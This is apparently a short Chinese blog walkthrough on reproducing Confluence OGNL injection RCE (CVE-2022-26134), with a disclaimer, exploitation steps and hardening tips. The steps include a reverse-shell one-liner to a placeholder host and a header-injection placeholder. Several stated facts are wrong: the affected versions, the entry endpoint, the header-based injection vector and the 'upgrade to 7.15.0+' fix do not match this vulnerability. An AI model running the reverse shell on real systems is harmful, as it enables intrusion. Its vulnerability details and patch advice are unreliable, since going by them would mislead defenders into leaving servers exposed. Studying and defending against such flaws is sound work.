Confluence-OGNL-RCE复现

Confluence OGNL 注入 RCE 复现(CVE-2022-26134):未授权代码执行、利用步骤、防御加固。

写在前面:合法学习边界

Confluence 攻击只在授权测试环境进行。对非授权目标进行攻击可能触犯法律。

一、Confluence OGNL 注入链

Confluence OGNL RCE 利用链
1
① 发现 Confluence → ② 确认版本 → ③ OGNL 注入 → ④ 执行命令 → ⑤ 反弹 Shell → ⑥ 提权

二、漏洞信息

1
2
3
4
CVE-2022-26134
影响:Confluence Server 6.14 ~ 7.14.3
入口:/rest/api/userinfo
类型:未授权 OGNL 注入

三、利用步骤

1
2
3
4
5
6
7
8
9
# 确认版本
curl -s http://target:8090

# X-Atlassian-Token: {{...}} 注入
# 验证命令执行
whoami · id · uname -a

# 反弹 Shell
bash -i >& /dev/tcp/xxx/4444

四、防御加固

1
2
3
升级到 Confluence 7.15.0+
Confluence 不暴露公网
WAF 拦截 X-Atlassian-Token 异常值

五、小结

Confluence OGNL 注入是典型的未授权代码执行漏洞。防御核心是升级版本 + 网络隔离